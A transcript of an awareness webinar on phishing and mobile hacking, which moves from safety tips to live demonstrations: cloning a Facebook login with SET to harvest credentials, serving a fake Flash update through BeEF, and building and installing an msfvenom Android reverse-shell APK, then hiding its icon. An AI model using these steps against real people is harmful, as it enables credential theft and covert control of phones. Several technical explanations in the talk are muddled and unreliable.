if you all will be having any doubt in the session, just make sure you put it in the Q&A section and we will answer it at the end of the session. Is that okay with everyone? So Likhit sir, all over to you. Welcome and just start the session.
Yeah, hello participants, and thank you Tashu for your introduction. So let me share my screen. Yeah, so from the participants or anyone panelists, can anyone let me know whether my screen is visible or not?
Yes, it's visible.
Yeah. Okay. So guys, welcome to the session. Thank you for joining the session. So today's topic is like just one click away to get hacked by Likit Kanigalla. That's me. So I just welcome you with a link which is welcome.com. Um, let me just go on to that. So before the start of the session, there is small friendly requirement. In this journey of, we are going to take the session of around 40 minutes to 1 hour. In this journey of 1 hour, we are going to learn some cool stuff which is related to almost, you can say, hacking, and which is related to the links and so on. And it consists of theory and as well as practical also, because I don't think only the theory knowledge is sufficient for to gain the knowledge. Practical is very more important, and this is for only for the educational purposes. For if you had used it in wrong way, I'm not responsible for it. And thank you Gravity for giving me this opportunity, and the Gravity is also not responsible for this, so make sure you use for good things. Okay. um, So let me give you a brief idea what I'm going to say you in this session. Firstly, who am I? Already Tasha has been given me, but still I'm having built my introduction. And second one, our emails are safe. Like have you, if you had just opened the mailbox in your computer, you might see a tab which is called the promotions and so on so on. So how safe are those emails? And do you trust me? Then of course you're not. If you are trusting anyone, either it's relative or it's your friend or it's everyone, you are not safe. They can attack you anytime, at any point of time. And I will also let you know the mobile security, what the mobile security is. And I can also see you like like once you are going to be hacked, what are the things I can see from your mobile? What are the things I can get you? And I'm going to explain you how you are going to be trapped in such scams. In some cases, you don't know even that you are hacked, that your phone is hacked. You don't even know about it. And also, at last, hyperlinks like 50% off on this one, Netflix 10th anniversary, WhatsApp is celebrating Independence Day. So click on this link. WhatsApp has been Facebook. Mark Zuckerberg is going to be ban your accounts, Facebook accounts, if you are not click on this link. There are so many things like this. And apart from these, all the topics, I'm also going to share last but not least, which is how to be safe. Because hacking, in the sense, not only the thing you are going to hack, you should be also safe. For example, you are hacking some person and he might revert back to you and hack your phone also. So you should be safe to how this is going to be done and how to be safe. I'm going to conclude the things with this topic. So firstly, uh, know who am I? So my name is Likit Kanigolla and it's my identity. Coming to my job and so on, I'm a deep learner. Learning is a long journey which never ends for the lifetime. If even you got 60 years, even you got 80 years, even you got 100 years, the learning will not be stopped. And I will help the companies to like how they are going to be happy. Like I'm letting the companies to know how they are going to be hacked and how secure, which is also called as penetration testing and bug bounty. So, am I only hack the things? Like, am I only the hacker? No, I'm also a web developer and also an Android developer. And also, not only these technologies, I'm going to learn more and more in upcoming days. So, first question, whenever a person says hacking, okay, the first thing comes in his mind is okay. So hacking means you can see my phone, you can see my photos, you can do anything. Whenever you think of hacking, the black screen with a green text with a typing speed of 90 words per minute and so on. This is the scenario or this is the situation like you comes in your mind. And main question, it's not like the movies in which they do some commands and just your phone is not like that. So this is the main question: how anyone is going to be hacked, and can we do that remotely without any physical access? So the answer for this question is no. You can't hack anyone until and unless the victim clicks on any link or installs any link or does anything. So, what are the links? There are some logger links. There is a website like IP Logger. What it does is it just redirect the things. Okay. For example, if I just go on there and kept any google.com, okay, or else I'm going to do like I'm going to show an YouTube video, okay, and what I'm going to say is I will make the IP logger and I will share it with my friend that hey, here is my new tutorial. Go and check there. Okay. So what he thinks, he just click on the link, and once he click on that link, nothing will happen to him. Okay. He will just redirect to go to the youtube.com and check the tutorial which I had shared. But the thing was, I will get his IP address. So what can you do with the IP address? You can get the location, you can get some internet data, you can get some stuff, okay, backend stuff, and you are also going to get if it is an Linux system or else Kali Linux, and you can just got the things. You can what you can do is you can go to the SSH and anything can be done. And again links, which is links they are going to offer you some kind of stuff, okay. Mainly there are so many cases, even my one or some of my friends has been fallen in the same trap. They just click on that link. What it happens is his phone is going to be hacked, okay, mainly his browser is going to be hacked. And not only his phone, automatically once he got hacked, what it is going to be do is it is going to, for example, I had just named a friend Rajesh, for example. So he is fall in this trap. So I got a work to the Rajesh and just message it to hi. So what he is going to be doing is like there will be some kind of text like I'm busy at right now. Email me at this point, okay, or else check on my schedule, or else hey, okay, I will. Hey, how are you, man? I just checked this out. It was super cool, and I got a Netflix account. Okay, and you also click on it. You will also get it for free. Trust me, you are going to get. So it is a kind of the thing like he is so friendly and you will get the things like okay, yes, he is trusted person. So I can click on it and your phone is also going to be hacked. And one of the major going issue, APK. I think all of you are aware of the APK. Mainly before cases, the hackers are going to say that just go on to this website and you will get the application. Just install that application, your KYC will be done. Okay, but the people has been upgraded and the police department was doing fantastic job keeping awareness about the don't go on it, don't go on it, don't go on it. And hackers also, they had another backdoor. Hackers is going to think like okay, this door was closed, let's open another door. Now what the thing was, they are going to create their own apps. Okay, and they are going to create their own apps and publish it in the Play Store. And if you just got a call from any operator and just says that your KYC is not done or else this process, that process, the person is going to think is okay, it was a Play Store link. So it was a Play Store link. That means the Play Store links is trusted. Play Store means trusted one. So I can install it from the Play Store. No, it's not. Play Store, if I say about the difference between the Play Store and App Store, some people say that hacking an iPhone is difficult. Okay. The reason is in the Play Store, if you just publish an app, it is going to check the prior check, just a basic check, and just going to publish the things. Okay. So there is a major chance of getting the virus in that. And coming to the App Store, it is not the basic check. It assures that it has no malware, it has no phishing, it has nothing. Then only after the complete check, it is going to be published. And this is why publishing an app in the App Store is more difficult than publishing an app in the Play Store. So make sure be aware of the things when you are just installing any app. Okay. So do you think a single link, what can it single link do? Okay. I just open it up. What can it do? So it can authentication. When it can steal your sensitive data like passwords and so on. Okay. Uh, Mainly called as cookie hijacking. For example, you are using some browser, the cookies, the data is stored in the cookies and it is going to store in your browser. That one link can give the cookies to the hacker. If he just go on to the his app browser and paste the cookies, the Gmail, the however session, for example, a browser, you are using a browser and you open Facebook, Instagram, LinkedIn, Gmail, and YouTube. Okay, you just doing some work. So if I got the cookies, all the cookies, what I'm going to do is I'm just going to paste settings and I am going to get those. Like seriously, how it is happening? It is called cookie hijacking. It is a bug. It is a bug. So many companies is going to be fixed that, but still there is some hope. Gmail, for example, Gmail is that in Gmail you cannot do the cookie hijacking because it's secure, or else you can do check on the site, but you cannot steal the cookies of that particular thing, but you can steal the cookies of the browser and metadata. Generally what we do is we will generally forget the passwords. That is the reason we are going to store the passwords in our browser. For example, if our browser has been hacked, all the passwords is going to be the going to send to the hacker, and all the accounts, all the passwords you have saved, it will be going to the hacker. uh, and coming to the privacy, they can also steal your private data, just like what sites you are exploring and what are the some online cookies and so on. If they hack your computer or else your mobile, they can go on to the any folder they want. They can steal any kind of photos and so on. And third thing and the major issue, malware. So if I just given to the brief introduction about the malware, it's just a kind of application. When you just install it, it is going to be hack all your files. You cannot open any kind of the file. Okay. If you just attend, you cannot do anything. Okay. And it leaves a message that, hey, your files are so safe with us. Don't worry, we are not going to publish it anywhere. You have to just pay us $900 or else some kind of amount just to our Bitcoin. Okay. Once you are done with the transaction, we are going to give you all the files. Okay. If you want to explore the demo, just pay us $2 or else $3. We are going to decrypt one file for you. Okay. So majorly what the people think is, okay, oh my god, my got hacked. So what can I do? What can I do? And they are going to just check. Okay, some people will pay the money. Okay, some people what going to say is like just open some file. So whenever you pay the some demo amount, na, like $2 or $3, it will run a fake decryptor on your computer, and it says file is being decrypted, and a file which is not yours with some kind of the text. Okay, see, whenever the files is going to hacker and RCE was done, the hacker will got all the things, right? So they will give you a sample file and you thought, yes, it is opening, it's secure and it's genuine, and you're going to pay. Never ever do that. If you had paid the full amount, no one is going to look on it. So this was, and also not only to you, uh, it's going to be secure, it's going to not safer for the others also. Okay. So, coming to the email crimes, okay. So there will be some kind of heading like "Hurry up, flash sale just for 2 hours, only for you." Okay. Not every email is fake. Every offer or coupon which you got in the mail is somewhat genuine. Just check from which email it has been received, and also what is the just go on to the original site. For example, you received an gift coupon or else gift voucher from Vola, or sorry, or else Uber or something else. Just go on to the site. If it is a public offer, it will be available for everyone, right? Just go on to the site and check whether the offer exists or not. And second thing, clicks. If you just go on to the, let me show you the pointer. So if you just go on to the here and just there is some kind of coupon code and you just click on the book now. Okay, what it is going to be happen is it might be a genuine link or it might be a phishing link. You don't know. And as I said you before, just confirm from the company website also. And if you found any kind of phishing email or else wrong email, just mail to the company. There will be support team for you and let them know. In some cases, for letting them know, you might get some rewards in kind of in terms of cash, in terms of coupons, or else for securing themselves. And one more thing, until and unless you click on the link or else you click on the link or else you click on the application, you installs the application, you are safe. Until then, you are safe. So, actually, recently Ola has been launched this electric scooter. Okay, since I'm the user of Ola, I got an email. Okay, and some after some time after the I received the original mail, what I got is like I got an another mail. I was shocked. Okay, Is it true or both are same or not? Okay. So this is the original email and this is the fake email. You can check that the email was same, the image was same, the matter was same, the content was same, the link was same. Olaelectric.com, olaelectric.com. But if you just, you can see if you just scroll on it, if you just hover on the link here at the bottom left corner, you can see some link like zerozip.ru. Okay. If you just go on to the Google and just check this domain, it is an IP logger link. Okay. See, I just hovered the link over here, and what I got is 02rip.ip.ru and some kind of text. This is an IP logger link. So, for example, and if I just click on this link, nothing will happen. It will just redirect me to the Vola Electric. But your IP logger is captured by some hacker. Your IP logger is captured by some hacker. What do you think? Okay, it is just open, right? So what the link is for me. So it's just open, but you have to be secured whenever you got the link in emails, or else whenever you got the links in some kind of blogs. Just before opening it, just hover on it and you can see the original link. If you found okay, it's okay, you go for it, or else you just copy the link address, and there is an application in the Google, which is named, you can just go on to the redirect checker. You will get a link and just go on to that, paste on it. What it does is it will opens the site and let you know, okay, whether it is an redirect or else not, and it will just go on to the last site, which is, that means you are going to be safer side. So also in Gmail, there is an algorithm which detects these kind of links. So be careful with this message. Google could not verify the things. Okay, and it is similar to the things, and report not spam. These are the some warnings given to you. If you just go on to the chat box and sorry, if you just go on to the spam box in your Gmail, you might see some spam mails which is having these kind of banners. So be safe with that and check the whether the email came from the things or not. And how exactly it works. As I said you before, when you just scrolling on to the article, a pop-up comes, a fake pop-up comes. I'm going to show you, demonstrate you the practical for the same. Uh, I don't know how many of you have explored some kind of torrent sites like whenever the movie downloads, like just like movie reels or something like that. When you just go on to that, when you are just downloading the torrent files, if sometimes a fake pop-up comes stating that Adobe Flash Player update, kindly update the Adobe Flash Player. Okay, and it comes like a warning comes to you. Your phone is get hacked. Just click on this link below to decrypt it. So whether it redirects to the some site, or else when you just click on it, it directs to the some redirect site which is having some phishing mails or malware, or else it is going to download some things. And whenever, as I said you before, Adobe Flash Player update, what you think, say okay, Adobe Flash Player maybe got the new version and you are going to install the same, and but what it is going to be installed is some kind of ransomware. Once they got the ransomware or your phone is hacked, they are going to get the RCE. What is RCE? It is remote code execution. So in the remote code execution, you can access your phone. I can access your phone completely by just using the small commands in my computer, and they're going to steal the information. Okay. You also trust factor. Uh, Firstly, never share your critical data like Aadhaar cards, PAN cards to anyone, because it might lead to the leakage. And don't share it in your poster like social media. And when you just capturing the photos, make sure like nothing was present in that. When you just posting anything on the social media, if you are like even the Aadhaar has been provided a feature called masked Aadhaar, which hides your first 8 digits and displays only the last 4 digits. If you want to give to anyone for the verification purposes, give those others, not the original ones. And your friends, I'm not saying like friend is going to hack your phone, but even sometimes for the friendly purposes, for the pranking purposes, your friends also going to hack your phone, and sometimes it might leads to the serious things. And fake callers, some callers will call you from, I'm calling from this bank, I'm calling from this agency, you just fill it out this form, you just click on this link and so on. And do not visit the not secured websites. I'm not saying like HTTP and HTTP. HTTPS is secured one. You can go on to that and no one can steal. But if you just click on that link, uh, at that point you are going to be hacked, even it is an HTTPS. But majorly hacking can be done in HTTP ones. And don't save the passwords, and don't use the same passwords for everything. The same password for the Gmail, Facebook, Instagram, LinkedIn, Gmail, and anymore. We just use, and mainly commonly used password is name at the rate 123, or else 123456. So, and also websites, the since the most ads are being common in these websites, so make sure you are aware of those things. So come, finally I'm done with the boring theory. I guess you did not feel the bore. So let's go on to the practical field. So it's time about 11:33, and I'm going to show you some things about the social media, like phishing links and browser hacking, and as well as Android hacking. So let me share out my screen. Yes, I guess my it is visible to you. Okay. So I guess my Kali Linux is visible to you. So first thing, social media ones, which is a set toolkit. This is the one of the major tool which is going to be hacker be done. So if I just type out the set toolkit, I got social engineering attacks, third party modules, update the social engineering toolkit, and penetration testing. So I just click on the one. It's just the couple of numbers. That's it. So I just go on to the click on the one, and what I got is space phishing attack vectors, website attack vectors, infectious media generator like PDF files and so on, and mass mailing attack, and Arduino based attack, wireless attack, powerless attacks. So if I just go on to the website attack attacks, so it is going to Java applet attack method. These are so kinds of method, Metasploit method, credential harvester method. So majorly, if any hacker wants to get the credentials, they are going to select the credential harvester method. And it also having some basic website templates and site cloner. So if I just clone the site, it just which IP address it should be tracked. So I'm going to type out the IP address, and so what is the fake, what is the site I want to clone. So I just go on to the https // facebook.com. Okay. And so it just okay, so it just opened it out. So if I just click on the browser, and just a minute, let me adjust my screen. um, so Firefox has been opened, and if I just go on to the here, and I just click on 192.168. So what it happens is, you can see it just redirect to the Facebook. Okay. And for example, here I'm going to type hello user. Okay. This is my username, for example, and my password is HELLO at the rate 123. Okay, if I just click on the login, it is asking for the things, and it is redirecting the original site. Okay, it is redirecting the original site. So if you just check out here in my panel, um actually here it's see, email is hello user. Okay, and the password is also can be found here at the same point, hello at the rate 123. This is how it is going to be done. This is how it is going to be done. uh, so had password free billet false and password, this is the hash key, and this is how you are going to get the things. Like this is how the phishing links are going to generate it. Let me just exit out this and clear out the links. So this is how the phishing is going to be happen. Okay, let me show the session. Uh, so now this is how set toolkit works. And coming to the Android hacking. Okay, so let me tell you the uh, this framework also, browser hacking. Okay. Um, yeah. Mm, it's let me open this framework. So basically, B framework is the framework in which it is going to be hack your browser. It is the so if I just go on to here, so what you need to do is, what you need to see, this is the one, this is the panel in which you are going to get the things revert back. Okay, so if I just go to this panel, it is asking for the authentication. So let me just log on to the my username and password, and here the default username is beef is the username and beef is the password. You have to change it. Okay, let me type out my password. Let me just give me a few minutes. I don't know why it's working. Okay, I just typed out the wrong password. Let me type out the yes. I hope my screen is visible to you. So this is how the brick framework works. You can create an some kind of browser site, okay, or else they will give you some link. Okay, so if you just go on to the this link, okay, you can if you are having any kind your mobile phones, or else you are having your laptops open, you can just open this link, okay. If I just exploit here, whenever you just open the link, what I'm going to get is I will get your IP address, okay. And there are some commands you don't need to do. Firstly, the people things like hacking means lots of needs, lots of programming language, lots of commands. No, it's simply classified, okay. So if I just check it over here, there is a browser, and I can detect the Foxy Trader, Firebug, QuickTime, Real Player, and webcam permission check. I can check the webcams, and I can check the get the all the cookies. And if I just go on to the social engineering, I can let me just fake notification bar. Okay. So what I'm going to type out is here, I'm going to replace the URL with my URL. Okay. So if I just execute, so let me show you. It is just normal one, right? Okay. Nothing was there. So if I just execute over here, I got the header. Additional plugins are required to display all the media on this page. Install the missing plugins. So what you think? Okay, you are going to install this. Click on this, and whenever you just click on this, it is going to install you a ransomware. Okay. Uh, Actually, if you just uh, send this page to anyone, they are going to say that okay, it's going to the like exploitation. No one will just go on it. Okay. So if you just use your web development skills and create a beautiful site, which is a beautiful blogging site and a blog, and you are going to done this, okay, then they are going to think, okay, it's a trusted one, and okay, it's your friend only, you can buy it. And if I just go on to the here is a fact fake flash player update, okay. So if I just go on to the here and replace my IP address, and here is the link of the file I will upload in Drive, my ransomware, and I am going to keep the URL here, okay. Okay, just go on. Let me go on to the GitHub. Um, okay, let me just go on to the. So, so here is my account. So I just go on to the uploaded things, and if I just go on to the repositories, I got some repositories. So what I'm going to do is I'm going to just copy it, and I'm going to copy this Git link, okay, and I'm going to paste over here, okay. So I'm going to paste, or you can also say custom payload, or else Firefox extension. You can do anything. So let me execute this. I had executed. So if I just got on here, see, and updated to the Adobe Flash Bear is available. This updating will stop, and so on, so on, so on, so on, so on, so on. Like it is completely genuine. Looks like genuine. Okay, it is in fake. You are not able to guess it is in fake flare. Right? You just click on the remind me later. Okay, it just what, even if you just click on the remind me later, it takes to the same, or else okay, let me use the same one. So if I just go on to the here and execute, so what I get, even you click on the remind me later, it is going to share something, okay. And if you just going to install, okay, I think there is some issue with this file, I guess. Let me check. I don't know what happened to this. Okay, but if I just click on it now, it is going to open. I think this URL is not present at the moment. I guess. Let me do one thing. So I just got this link, right? Uh, copy link, copy link. Let me just go on to a new tab. Whether yes. So what I'm going to do is like I just keep the file over here, okay, and I'm going to execute. So I'm just going to learn whenever I just click on it, I got this image, okay, or else it is going to be automatically downloaded. I think there is an issue with this Firefox, or else I don't know what is happened here. Uh, but generally, if you just click on it now, like you just give on the downloaded file, right? So if I just go on to the any kind of image and you just download the file automatically, this link is going to get the things, and when you just install it, and you will get automatically the application will be downloaded. Okay. So this is how it happens. And not only this, you can see Google phishing, fake notification bar, fake flashware update, click voice, text to voice, uh, fake Evernote Clipper login, fake last password. So if I just go on to the fake last password and execute, so see, it is not once you got it, you are not having any kind of close button over here. Okay, to close this flash mirror, either remind me after takes to the same, either the install takes to the same. You are completely locked now. So in this case, you just close the browser. This is the best option you are having. And similarly, you can see there is a phone gap alert using if you are using the phone. Okay, like if you just execute it, I think it will not work over here because it's not a phone. Okay, if you just get the beep sound, check connection, geolocation, keychain, list of the contacts, list of the files, list of the plugins you are using, you are going to prompt the user, huh? See, Apple ID, please submit your password, default text password. And you should just go onto the man in the browser attack, create pop under Metasploit. If you just go onto the network over here, cross request, flash update, DNS, detect bug, get the proxy servers, HTTP servers. You're like, I got the complete command. Uh, you will get the complete command over here, okay, of your browser. Not you can just go on to the, I think if anyone has been gone there, you guys can see the same page. Okay, this is how it happens. And coming to the one of the things, whenever you just go on to the, I got the things like, see, this something user has been opened this file, has done this, the hooked browser, I got hooked that thing. Okay, this IP is the same, and I got the status code of the success, and executed instructions, and this is that thing. He clicked on this many times, he clicked on, I get everything, I get everything. Okay, so whenever you click on the things, just be safe. And let me give you, okay, it's 11:50. Let me take I don't know whether it's there is a time to show you or not, but okay, let me conclude it in the speed way. So coming to the Android hacking, the hacker is what hacker is going to do is he's going to generate his own APK. Okay, and if for example, if he hasn't got his own APK, you in the Kali there is called MSF Venom. Okay, let me write the command MSF Venom minus P, MSF Venom minus P, and you're going to use the Android slash meterpreter, meterpreter, and slash reverse underscore TCP. And what you are going to do is you are going to L host, and you have to give your own IP address over here, so that it revert back to you. And you L port, you can use any port, any free port, but make sure your ports were free. And R, and as well as I just give the name of um, Graviton. Okay, graviton.apk. Okay, And what I'm going to do is I just click on it. Before running, let me give you an explanation to this command. MSF enum is the like payload to generate the Metasploit command. Okay. And Android is the you are going to use the you're going to use the payload that called Android Meterpreter reverse TCP. This is the payload you are using in the Metasploit. And coming to the L host, it is your IP address, and L port, it is your port, free port, and R means you are going to writing the thing, and as well as at last graviton.apk is name.apk. You can use liquid.apk, you can use sham.apk or anything. So I got the thing. So if I just check over here, uh, I got the things where I got it. See, I got the graviton.apk. So to make this executable, like it is the executable, you can directly send to any friend, okay, or else you can put it on your any site, like just like the Flash Player update, and you are going to just download the things. But to make this the host, like that link, just go to this link, the download. You can use any cloud service to get the better connectivity. So before like to just hosting on the local system, so what I'm going to do is move graviton.apk uh, to the my root folder, which is where www/html. So I'm also going to the where. So let me just check out here. I think yes, it is got removed. So I just go on to the cd where and slash www/html, and I just gone here, and you can see graviton.apk. Now what I'm going to do is I need a server to host this, right? So service Apache to start. What I'm saying is I need an Apache 2 server. It has a service. Go and start. So the Apache server has been started. So now what I'm going to do is I'm just go on to the MSF console. Okay. It is a console where you can get the like all the Metasploit commands. You can exploit using this Metasploit. Okay. Every time this is not the same banner you get, you will get different kinds of things. So before, as I said, use the exploit. What is the exploit? It is use the exploit slash multi slash handler. Okay. So okay, failure to load, no results. Okay, I guess uh, what is the use the exploit slash multi handler. I don't know why it is happening. Why what is the issue in it? Is the use exploit slash multi slash handler. So I don't think some kind of issue with the network or else something else. So I just got the my exploit slash multi handler, and now what I'm going to is set the payload. Set the payload to the what is the payload? Android slash mm, interpreter slash reverse underscore TCP. This is the payload we are having. So the payload is set. Now I'm going to set the L host. Okay, L host, which is my IP address 191. You can give any IP address over here because it is the server where you want to host it. Okay, 192.168.10.3. Okay, and I'm going to set L port. Okay, which is the port 4444, and the port is set. So if I just go on to show options, what I got is I got the L host set and L port set. So I just click on it, exploit. So what it happens is it started the things. Whenever you're going to send this thing to the thing, to the any person, and whenever he clicks over here, and it will is going to be open. Okay, let me show you the in practical way. Ooh, um, let me just go on to the browser, and I'm going to search the IO. File IO is the file transfer file. Okay, and if I just go on to the here, and it's lavithon.apk, and I just opened over here, and it is uploading, and I got the link. Okay. So if you just send it to your friend, and you are going to Android developer, and what you says, bro, I had done an app, so please kindly install it and test the app. So what you are going to think is, yes, he is my trusted one, so going to extend it, right? Um, so so let me give you a minute. Let me actually I'm installing it on my phone. Whenever you want to try it on it, just go on your phone and install it there, because if you just install it on your any other, eh, it is got deleted. Or else if you if any volunteer was here and he wants to install it on your phone, you are most welcome to it. um, yes, something I guess some issue has been happened. Let me upload it again. Uploaded, because I don't know, I am not getting the link. It was saying the file was deleted. Yes, I got the file. Before installing any APK, the Android also says you it is having some kind of malware activity. Okay, so make sure you are safe with it. It is going to warn you. It is going to say you. Let me show on your my phone also over here. And so when I just go on over here, okay, the app is not installed. Just let me go on to the my files over here, and let it case, and it's the graviton.apk. I'm going to install the same. So it is getting installed, and it is saying the app might be harmful. I'm going to install anyway because it was given by my friend, right? Just give me a minute. So you can see over here, I got, see, send app for scanning. I send, don't send. If you send, it will send it to Play Store. So if I just click on over here, okay, so what I got is location, phone, SMS, microphone, camera, storage, call logs, all. And what these all are the app permissions. I just continue over here, and it was closed. See, the app was built for the older version. And if you just go on to over here, and see, I got the session and I got the terminal. If I just click on over help, See, I can run all these commands. I can take the screenshot. I can use the screen share. I can do the if config or else. And mainly now, the first thing the hacker is going to do is hide underscore app icon. Okay. So if I just install over here, so if you just check it over here, the app is, yeah, here, right? So whenever I just run out this command, okay, hide app icon, so you can still see the app and it is going to disappear once it is executed. It is being executed, I think a long time, I guess. Okay, it's timed out. No issues. I think session got timed out. Timed out. Let me do one thing. Let me create this session. Okay, and I just click on the exploit. So it started. I just opened the app and I got the session. And now I'm going to hide app icon. See, whenever I got the things, my app has been hidden. See, but if I just go on to my settings and just go on to the my apps and app list, and when I just scroll on over here, I can see an app called main activity. This is the one which runs on the background. And what you think, no app has been installed on my device, so you are safe. You think you are safe, first go and check and the app icons, and if anything found, just like over here main activity, just click on the uninstall. Just click on the uninstall. First uninstall the app. Okay, this is how it is going to be happen, and this is how your phone is going to be happen. And this is how once you are install it, you are safe. And so be safe, be safe. This is the practical thing I want to show you upon. I hope you liked it. Huh? And let's see what will, yeah, I had a safer side and malicious file generating, remote code execution, phishing link. So coming to the how to be secure, don't go for the free traps like just free Netflix accounts or something else. And frequently do the security checks, and never save the important information on your file. If it is saved, also authenticate with the password. Even you authenticated with the password, for example Aadhaar card was there and it was authenticated with the password, it easily cracked with the John with the right one. So make sure you use the passwords, and don't open the debugging on your mobile. Okay, and for turn on the 2FA securities and so on. So thank you. That's it for my presentation. So if you are having any questions, just let me know. I'm going to clarify you. And as well as this is my LinkedIn profile, just connect me over there. And I would like to thank Gravity for this, giving me this amazing opportunity for me. So, are you got any questions? Okay. Okay, I can.
Hello.
Yes, Tasha.
Yeah. Thank you so much, sir. And now we are having some questions. So shall we start with the question round?
Yes. Of course.
So first is, what is metadata?
So metadata is the thing like you just store on the when you are visit the cookies, some kind of data will be stored in the cookies, right? It is called the metadata, and it is a kind of cookies and having some crucial information.
Okay, so and one more question is that can virus detect total IP logger links?
No, no virus can detect the IP logger links because it is just a normal site. You just need to keep aware of the domains you are just clicking on. Whenever you found this like domain, just go on to the Google and click check the domain. Then you will get all the things, whether it is an IP data or else something else, something else.
Okay, and also someone is asking about your journey from beginning. Can you just share about it, how you started the preparation for hacking?
So coming to my journey, actually I started with the bug bounty. I just I got some kind of interest. One of my senior from my college, he was very good at it, and I was got inspired from him. And I just learned out from him the everything, and he taught me how to this get started in bug bounty and so on. Once I got into the bug bounty, I usually love the Python language. So once I got into the cybersecurity field, the Python is the same where I can use the cybersecurity, and so it got interest, and coming to the in the same bug bounty. So I got the interest. How about normally in bug bounty we are going to companies, and how about we secure? If you want to secure your device, that means you should know how it is going to be hacked, and that's how I learned the things. And so many people ask me about the like what which is the best hacking course I can purchase. See, in the if I consider about the bug bounty and so on, you can go for it, like you can go for the things. There are some companies which offer you the bug bounty programs, and yes, and you can go for it also. um, Coming to the hacking courses, see, no one teaches you the complete hacking, and there is no such kind of the course. Even if you teach also, they just go on to the internet and explore yourself and learn. See, MSF console was there. If you just go on to the MSF console and tutorial, you will get a lot of tutorials. Just go on it, explore it, and think about it, think in a different way. See, the APK I generated now, in later versions like just Android, it might not work, or it might work sometimes. But coming to the previous versions, it works for like Android 5 or 6. So you create your own APK. Don't depend upon the commands. Okay, it would be more better. You can learn reverse scripting on. You can It is available on internet.
Okay, so and we have one more question like how to check malicious APKs.
Malicious APKs, you can, if you are using some kind of antivirus, you can just go on to the scan, or else mm, we can't detect the things like, but by using some antivirus and security checks, you can detect that at up to some level, up to some level.
Okay, and one more question, please tell the best undetectable rat.
Undetectable rat, undetectable rat, coming to the things like everything will be found. If you hack anyway, it can be found. But some might what some will take much time to uh, guess, and some will take low time to guess. So I cannot say that one particularly. um yes, anything was detected, anything was detected automatically. Like at the particular of point time, if you commit any crime, automatically it will be detected.
Okay, now I don't think there is any other question. If anyone has any other question, you all can put it down. Otherwise, I think everyone is clear with the questions.
So coming to the payloads, again, when I gave in the session, I got some things like, yeah. So coming to the payloads, there are so many kinds of payloads, nearly about 200 to 300 payloads, which is varies from Windows, Mac, and Android, iOS. They varies from it. So you just go on to the things, and reverse TCP is the reverse connection, which allocates you to give you the remote code execution. For example, a malware was there, it doesn't need the remote code execution. Okay, but when we want to access the files, we need the remote code execution. That means reverse engineering. So that is the reason we use it the reverse TCP. Okay, TCP is the connection. And coming to the things like, if I had just showed you hide app icon, and the hacker is not going to do the things one by one, because he doesn't know how much time the connection lasts for. It might last for only one command. So he will purely only, he will make sure, right, and what he wants to access the call logs, he want to access the things. What he does is, first of all, he hides the app icon, and the next thing, and he will write the command like hide icon, and detect the dump call logs, dump contacts. He will write the single command and executes at the same time. This is how you can make advanced payload. And if you are
Okay,
having any kind of questions also, you can connect me on the LinkedIn, and you can get the clarification from there also.
yes, everyone, if you all will be having any questions, just you can access the LinkedIn too. And I think we are done with the questions. No more questions are coming. Okay, so thank you so much, sir, for sharing your valuable information with us. It was a really great session, and I hope everyone got a lot of value from it. And
Yes, thank you. I would like to thank you, Gravity, for giving me this opportunity.
so much for attending our audience. Thank you so much for being here, everyone. And I hope you all had a great time. And have a good day, everyone. Thank you so much for attending. Thank you so much, sir. And with this, we are at the end of today's session. We can see the comments that it was a great session for everyone. So shall we end the session now?